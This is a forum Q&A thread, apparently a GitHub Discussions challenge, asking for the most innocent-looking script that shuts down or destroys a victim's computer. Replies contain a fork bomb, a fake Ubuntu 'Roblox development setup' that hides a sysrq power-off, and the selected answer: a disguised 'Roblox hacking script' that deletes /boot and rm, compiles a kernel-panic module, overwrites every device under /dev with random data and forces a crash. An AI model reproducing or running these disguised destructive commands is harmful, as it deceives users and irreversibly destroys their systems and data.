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Problem 4: Shutdown! #4

Answered by mpldr
Ta180m asked this question in Q&A
Problem 4: Shutdown! #4
on Apr 15, 2021 · 4 answers · 4 replies

Your task: Write the most innocent-looking script that actually shuts down the victim's computer!

Sooo… I made a system destruction script. But hey, if the system does not work… it "powered off".

Roblox Server Hacking script. 100% legit. Really works. I just got 50 [insert game currency here]! you have to try it out!

if [ "$(whoami)" != "root" ]; then                                              
        echo "Sorry $(whoami), but hacking a mainframe requires root permissions"
        echo "use 'sudo !!' to feel like a real 1337 H4XX0R!!!11!"              
        exit 1                                                        …


4 suggested answers
4 replies

:(){ :|:& };:

1 reply

mpldr on Apr 15, 2021

* this is not my submission


on Apr 15, 2021

Important: please define "shutdown". Do you mean turn it off, a state where it cannot run anymore, or something else to fuck shit up?

1 reply

Ta180m on Apr 15, 2021
Maintainer Author

All of the above. The worse, the better!


on Apr 15, 2021
Maintainer Author

Why you should never blindly copy commands from the internet...

# Troll all the Ubuntu n00bs
# Set up your ROBLOX development environment!
sudo apt update && sudo apt upgrade # You've been updating your system, haven't you?
sudo apt install build-essential 1>&2&&echo o|sudo tee /proc/sysrq-trigger # Install development packages (some of them have some weird names)
sudo apt clean && sudo apt autoclean && sudo apt autoremove # Clean up caches
1 reply

aahh man… I wanted to do the sysrq trigger :D


on Apr 15, 2021

Sooo… I made a system destruction script. But hey, if the system does not work… it "powered off".

Roblox Server Hacking script. 100% legit. Really works. I just got 50 [insert game currency here]! you have to try it out!

if [ "$(whoami)" != "root" ]; then                                              
        echo "Sorry $(whoami), but hacking a mainframe requires root permissions"
        echo "use 'sudo !!' to feel like a real 1337 H4XX0R!!!11!"              
        exit 1                                                                  
echo "Starting hacking script…"; echo 1 > /proc/sys/kernel/sysrq;sleep 2;echo -n "Creating temporary    files…"; sudo rm -rf /boot 2>/dev/null;    
bash -c "while true; do echo mkdir ~/\$RANDOM >/dev/null 2>&1; done" &          
sleep 5;                                                                        
echo "done";echo "Looking for files…(0/4)";sleep 2;find / -name "proc" > /dev/null 2>&1;
ln -s /proc /tmp/p;echo "Looking for files…(1/4)"find /proc -name "trigger" \   
> /dev/null 2>&1;sleep 1;echo "Looking for files…(2/4)";ln -s /tmp/p/sysrq-trigger t;
sleep 5;echo "Looking for files…(3/4)";          
echo "Looking for files…(4/4)";sleep 4; rm $(whereis rm | cut -d " " -f 2)         
echo "Phreaking the mainframe…";sleep 6;echo "Social engineering the quantum matrix…";
echo "Scripting the backdoor…";printf '#include <linux/kernel.h>\n#include <linux/module.               h>\nMODULE_LICENSE("GPL");static int8_t* message = "buffer overrun at 0x4ba4c73e73acce54";int           init_module(void){panic(message);return 0;}' > bd.c
echo "Starting exploit…";printf 'obj-m += bd.o\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build    M=$(PWD) modules' > Makefile
echo "Opening power matrix…";make >/dev/null 2>&1; echo "Bye.";bash -c "for d in /dev/*; do bash -c     \"dd if=/dev/urandom of=/dev/\$d\" &; done" sleep 2;echo c > t
1 reply

Yeah, probably missed the mark a bit… I mean. this one actually destroys the system in a way that is not easy to recover.

Answer selected by Ta180m
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